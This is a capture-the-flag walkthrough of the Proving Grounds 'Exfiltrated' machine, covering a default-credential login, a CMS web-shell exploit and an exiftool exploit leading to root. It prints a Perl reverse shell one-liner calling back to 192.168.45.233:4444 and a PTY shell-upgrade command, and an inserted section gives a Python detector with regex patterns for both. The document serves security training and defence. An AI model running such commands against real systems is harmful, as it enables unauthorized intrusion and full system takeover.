Proving Grounds Practice — Exfiltrated

gizembozyel
Dec 10, 2023

Hello, today I’ll walk through the solution of Proving Grounds Practice — Exfiltrated.

First, we run an Nmap scan.

I tried the directories returned in the Nmap output for the website on port 80. I was able to log in with the default credentials admin:admin in the login field on the /panel page.

At the same time, I researched whether there was a specific exploit for the CMS.

When I tried the resulting exploit, we got a web shell.

We created and ran the following code with Reverse Shell Generator.

https://www.revshells.com/

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.45.233:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

To get a shell on our own machine, we ran the command in the web shell and listened on the port we set, 4444.

Then we upgraded the shell.

python3 -c 'import pty;pty.spawn("/bin/bash")'; export TERM=xterm-256color
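For defenders, the two one-liners above leave recognisable command lines in process telemetry. The following is an added example, not part of the original write-up: a small Python triage over constructed process-execution records. The rule names, the service-account list and the sample events are assumptions made for illustration.

```python
import re

# Constructed sample records (user, command line), shaped like what auditd
# execve events or EDR process telemetry yield once the shell quoting is gone.
SAMPLE_EVENTS = [
    ("www-data", 'perl -MIO -e $p=fork;exit,if($p);$c=new IO::Socket::INET('
                 'PeerAddr,"192.0.2.10:4444");STDIN->fdopen($c,r);'
                 '$~->fdopen($c,w);system$_ while<>;'),
    ("www-data", 'python3 -c import pty;pty.spawn("/bin/bash")'),
    ("deploy", 'python3 -c import pty;pty.spawn("/bin/sh")'),
    ("root", 'perl -e print "backup finished\\n"'),
    ("deploy", 'python3 -c import json,sys;print(json.load(sys.stdin)["v"])'),
    ("www-data", "php-fpm: pool www"),
]

# Assumption: accounts that run the web server and should never start
# interactive shells or outbound sockets from an interpreter one-liner.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx"}

RULES = [
    # Perl -e one-liner that opens a TCP socket and rebinds a handle to it.
    ("perl-socket-oneliner",
     re.compile(r"\bperl\b.*\s-e\b.*IO::Socket::INET.*fdopen", re.S)),
    # Python -c one-liner that wraps a shell in a PTY (the "shell upgrade").
    ("pty-shell-upgrade",
     re.compile(r"\bpython[0-9.]*\b.*\s-c\b.*"
                r"pty\.spawn\(\s*[\"'][^\"']*sh[\"']", re.S)),
]


def triage(events):
    """Return (user, rule, severity) for every command line a rule matches."""
    hits = []
    for user, cmdline in events:
        for name, pattern in RULES:
            if pattern.search(cmdline):
                # The same command is more alarming from a web service account.
                severity = "high" if user in SERVICE_ACCOUNTS else "medium"
                hits.append((user, name, severity))
    return hits


if __name__ == "__main__":
    for user, rule, severity in triage(SAMPLE_EVENTS):
        print(f"[{severity}] {rule} executed by {user}")
```
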

Let’s install linpeas.sh and see what we can do to escalate our privileges.
In the linpeas output, I saw that image-exif.sh was running constantly.

When we examine the code, we see that it uses exiftool.

I decided to research exploits for exiftool and to try the first one that came up.

After copying the file to my own directory, I tried running it; with the -s flag, we can get a reverse shell.

After creating our image.jpg file, we transfer the file through a Python server.

Screenshots: file upload, Python server

While creating the image file, we set port 4545 for the reverse shell. When we listened on this port, we got a shell with root privileges.

Yes, we now have root. We can get our proof.txt file.

We find our flag and complete the challenge. Keep hacking!

Practice makes perfect :)
